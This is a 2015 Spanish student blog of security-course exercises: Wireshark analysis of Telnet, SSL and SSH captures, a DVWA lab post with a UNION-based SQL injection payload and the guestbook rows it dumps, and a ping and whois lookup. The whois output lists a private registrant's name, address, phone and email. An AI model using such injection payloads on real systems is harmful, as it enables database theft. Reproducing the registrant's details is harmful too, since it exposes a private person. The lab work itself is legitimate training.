jueves, 1 de octubre de 2015

Sem2 - Tareas

Wireshark


Tarea1:

1.

Primera parte: analizando un protocolo inseguro - Telnet.


Traza con: telnet-raw.pcap
  • ¿Qué usuario y contraseña se ha utilizado para acceder al servidor de Telnet?
  • ¿Qué sistema operativo corre en la máquina?
  • ¿Qué comandos se ejecutan en esta sesión?
user:fake pw:user
Linux BSD
Comandos usados: echo, sbin, ping, ls -a, ls; www.yahoo.com ,exit,


2.

Segunda parte: analizando SSL.

Traza SSL: esta traza con tráfico SSL

  • ¿Puedes identificar en qué paquete de la trama el servidor envía el certificado?
  • ¿El certificado va en claro o está cifrado? ¿Puedes ver, por ejemplo, qué autoridad ha emitido el certificado?
  • ¿Qué asegura el certificado, la identidad del servidor o del cliente?

SSLv3 Record Layer: Handshake Protocol: Client Key Exchange
SSLv3 Record Layer: Change Cipher Spec Protocol: Change Cipher Spec

SSLv3 Record Layer: Handshake Protocol: Encrypted Handshake Message

Identidad cliente

3.

Tercera parte: analizando SSH.

Traza SSH: esta traza con tráfico SSH

  • ¿Puedes ver a partir de qué paquete comienza el tráfico cifrado?
  • ¿Qué protocolos viajan cifrados, todos (IP, TCP...) o alguno en particular?
  • ¿Es posible ver alguna información de usuario como contraseñas de acceso?
9 0.078259 192.168.0.14 193.146.78.18 SSHv2 646 Client: Key Exchange Init
SSH Version 2 (encryption:aes128-ctr mac:umac-64@openssh.com compression:none)
Message Code: Key Exchange Init (20)

TCP/UDP

No. Solo paquetes viajando.






Publicado por en No hay comentarios:
Reto con DVWA

%' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #

Vulnerability: SQL Injection

User ID:

 
ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #
First name: 
Surname: 1
This is a test comment.
test

ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #
First name: 
Surname: 2
These aren't the droids you'r looking for...
Obi-Wan Kenobi

ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #
First name: 
Surname: 3
The key is "use the force", Luke.
Yoda

ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #
First name: 
Surname: 4
Han Solo shot first!
Anonymous bystander

ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #
First name: 
Surname: 5
Master Kenobi, you disappoint me. Yoda holds you in such high steem. Surely you can do better!
Count Dooku

ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #
First name: 
Surname: 6
At last we will reveal ourselves to the Jedi. At last we will have revenge.
Darth Maul

ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #
First name: 
Surname: 10
Its a trap!
Admiral Ackbar
Publicado por en No hay comentarios:

martes, 22 de septiembre de 2015

Ping

C:\Users\Jorge>ping www.4frags.com

Haciendo ping a aws.4frags.com [54.72.114.52] con 32 bytes de datos:
Respuesta desde 54.72.114.52: bytes=32 tiempo=47ms TTL=44
Respuesta desde 54.72.114.52: bytes=32 tiempo=43ms TTL=44
Respuesta desde 54.72.114.52: bytes=32 tiempo=43ms TTL=44
Respuesta desde 54.72.114.52: bytes=32 tiempo=44ms TTL=44

Estadísticas de ping para 54.72.114.52:
    Paquetes: enviados = 4, recibidos = 4, perdidos = 0
    (0% perdidos),
Tiempos aproximados de ida y vuelta en milisegundos:
    Mínimo = 43ms, Máximo = 47ms, Media = 44ms

Whois:

http://ping.eu/ns-whois/

WHOIS – Lists contact info for an IP or domain
IP address or host name: 

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http//www.internic.net
for detailed information.

Domain Name4FRAGS.COM
RegistrarNETWORK SOLUTIONS, LLC.
Sponsoring Registrar IANA ID2
Whois Serverwhois.networksolutions.com
Referral URLhttp://networksolutions.com
Name ServerFRAG1.4FRAGS.COM
Name ServerNS4.ELMON.NET
Statusok http://www.icann.org/epp#OK
Updated Date29-may-2015
Creation Date29-jul-2003
Expiration Date29-jul-2020

>>> Last update of whois databaseTue, 22 Sep 2015 21:22:36 GMT <<<

NOTICEThe expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USEYou are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of useYou agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to(1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

For more information on Whois status codes, please visit
https//www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.

Domain Name4FRAGS.COM
Registry Domain ID101256439_DOMAIN_COM-VRSN
Registrar WHOIS Serverwhois.networksolutions.com
Registrar URLhttp://www.networksolutions.com/en_US/
Updated Date2015-05-29T04:08:10Z
Creation Date2003-07-29T13:12:12Z
Registrar Registration Expiration Date2020-07-29T04:00:00Z
RegistrarNETWORK SOLUTIONS, LLC.
Registrar IANA ID2
Registrar Abuse Contact Emailabuse@web.com
Registrar Abuse Contact Phone+1.8003337680
Reseller:
Domain Status:
Registry Registrant ID:
Registrant NameAlbert Bargay Ramonet
Registrant OrganizationAlbert Bargay Ramonet
Registrant StreetMasssamso 21
Registrant City:
Registrant State/Province:
Registrant Postal Code:
Registrant CountryES
Registrant Phone+34 938 209292
Registrant Phone Ext:
Registrant Fax+34 938 209055
Registrant Fax Ext:
Registrant Emailalbert@4frags.com
Registry Admin ID:
Admin NameAlbert Bargay Ramonet
Admin OrganizationAlbert Bargay Ramonet
Admin StreetMasssamso 21
Admin City:
Admin State/Province:
Admin Postal Code:
Admin CountryES
Admin Phone+34 938 209292
Admin Phone Ext:
Admin Fax+34 938 209055
Admin Fax Ext:
Admin Emailalbert@4frags.com
Registry Tech ID:
Tech NameAlbert Bargay Ramonet
Tech OrganizationAlbert Bargay Ramonet
Tech StreetMasssamso 21
Tech City:
Tech State/Province:
Tech Postal Code:
Tech CountryES
Tech Phone+34 938 209292
Tech Phone Ext:
Tech Fax+34 938 209055
Tech Fax Ext:
Tech Emailalbert@4frags.com
Name ServerFRAG1.4FRAGS.COM
Name ServerNS4.ELMON.NET
DNSSECUnsigned
URL of the ICANN WHOIS Data Problem Reporting Systemhttp://wdprs.internic.net/
>>> Last update of WHOIS databaseTue Sep 22 17:22:44 EDT 2015 <<<

The data in Networksolutions.com's WHOIS database is provided to you by
Networksolutions.com for information purposes only, that is, to assist you in
obtaining information about or related to a domain name registration
record. Networksolutions.com makes this information available "as is," and
does not guarantee its accuracy. By submitting a WHOIS query, you
agree that you will use this data only for lawful purposes and that,
under no circumstances will you use this data to(1) allow, enable,
or otherwise support the transmission of mass unsolicited, commercial
advertising or solicitations via direct mail, electronic mail, or by
telephone; or (2) enable high volume, automated, electronic processes
that apply to Networksolutions.com (or its systems). The compilation,
repackaging, dissemination or other use of this data is expressly
prohibited without the prior written consent of Networksolutions.com.
Networksolutions.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.




Publicado por en No hay comentarios:
Suscribirse a: Comentarios (Atom)